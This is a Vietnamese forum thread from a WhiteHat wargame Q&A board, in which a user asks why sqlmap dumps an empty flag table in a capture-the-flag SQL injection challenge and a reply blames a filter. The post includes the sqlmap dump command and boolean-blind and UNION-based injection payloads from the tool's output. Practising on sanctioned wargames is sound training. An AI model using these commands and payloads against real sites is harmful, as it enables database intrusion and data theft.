Dùng sqlmap không hiện flag

Thảo luận trong 'Hỏi đáp' bắt đầu bởi du0n9, 02/06/18, 09:06 AM.

  1. du0n9

    du0n9 Active Member

    Tham gia: 28/01/18, 12:01 PM
    Bài viết: 25
    Đã được thích: 8
    Điểm thành tích:
    3
    Bài web03 của whitehat wargame cần khai thác sql injection để lấy flag trong bảng flag của database petworld nhưng mình dùng lệnh:
    Mã:
    sqlmap -u http://chall04-web01.wargame.whitehat.vn/detail.php?pet=pet01 -D petworld -T flag --dump 
    Thì thấy bảng này trống trơn:
    Mã:
    [*] starting at 10:06:00
    
    [10:06:00] [INFO] resuming back-end DBMS 'mysql'
    [10:06:00] [INFO] testing connection to the target URL
    sqlmap resumed the following injection point(s) from stored session:
    ---
    Parameter: pet (GET)
        Type: boolean-based blind
        Title: AND boolean-based blind - WHERE or HAVING clause
        Payload: pet=pet01' AND 9068=9068 AND 'NcjR'='NcjR
    
        Type: UNION query
        Title: Generic UNION query (NULL) - 4 columns
        Payload: pet=-1354' UNION ALL SELECT NULL,CONCAT(0x716b787871,0x4565566d594e694d794a6b6844716f63496646654b4e677a686e7643556850736b61495a6f77444a,0x716b7a6271),NULL,NULL-- cmSH
    ---
    [10:06:00] [INFO] the back-end DBMS is MySQL
    web application technology: Apache
    back-end DBMS: MySQL 5
    [10:06:00] [INFO] fetching columns for table 'flag' in database 'petworld'
    [10:06:00] [INFO] used SQL query returns 1 entries
    [10:06:00] [INFO] fetching entries for table 'flag' in database 'petworld'
    [10:06:00] [INFO] used SQL query returns 1 entries
    [10:06:00] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
    [10:06:00] [INFO] fetching number of entries for table 'flag' in database 'petworld'
    [10:06:00] [INFO] resumed: 1
    [10:06:00] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
    [10:06:00] [INFO] retrieved:
    Database: petworld
    Table: flag
    [1 entry]
    +---------+
    | Flag    |
    +---------+
    | <blank> |
    +---------+
    
    Mình đã thử thêm --no-cast hoặc --hex nhưng cũng không có kết quả.
    Trong khi đó lấy dữ liệu từ bảng detail ở dùng database thì hoàn toàn bình thường.
    Có phải có cơ chế bảo vệ đặc biệt gì không, mong cao nhân chỉ giáo :)
     
    Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
  2. Baby_parrot

    Baby_parrot Member

    Tham gia: 17/04/18, 02:04 PM
    Bài viết: 11
    Đã được thích: 10
    Điểm thành tích:
    3
    Bài này tác giả có thêm filter bạn ơi nên sqlmap quét lỗi. Hướng bài này bạn nên thử các truy vấn bằng tay nhé
     
    Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
    du0n9 and whf like this.